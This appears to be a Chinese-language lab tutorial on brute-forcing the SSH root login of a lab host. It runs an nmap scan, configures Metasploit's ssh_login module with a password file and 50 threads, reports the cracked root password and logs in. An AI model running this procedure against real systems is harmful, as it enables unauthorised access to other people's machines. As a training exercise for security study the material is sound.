Metasploit對目標主機SSH爆破

Metasploit對目標主機SSH爆破

實驗原理:
    1) 靶機root用戶存在弱口令漏洞,利用枚舉的方法破解目標主機ssh服務。

實驗步驟:

一、利用nmap工具掃描目標主機
    1.1 使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。
    1.2 在終端中輸入命令“nmap –sV  -O 192.168.1.3”,對目標主機進行端口掃描,發現開放22端口。
    1.3 在終端中輸入命令“msfconsole”,啓動MSF終端
    1.4 在終端中輸入命令“search ssh_login”,搜索ssh_login的相關工具和攻擊載荷。
    1.5 在終端中輸入命令“use auxiliary/scanner/ssh/ssh_login”,啓用漏洞利用模塊, 提示符就會提示進入到該路徑下。
    1.6 在終端中輸入命令“show options”,查看需要設置的相關項,“yes”表示必須填寫的參數。
    1.7 在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。
    1.8 在終端中輸入“set USERNAME root”,指定登陸用戶名root。
    1.9 在終端中輸入“set PASS_FILE /home/passwd.txt”,設置暴利破解的密碼文件路徑。
    1.10 在終端中輸入“set THREADS 50”,設置暴利破解的線程數爲50。
    1.11 在終端中輸入“run”, 開始向目標主機爆破ssh的登陸帳號和密碼,登陸帳號爲root,密碼爲Simplexue123。
    1.12 在終端中輸入“ssh [email protected]”,連接目標主機,然後查看網卡信息。
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章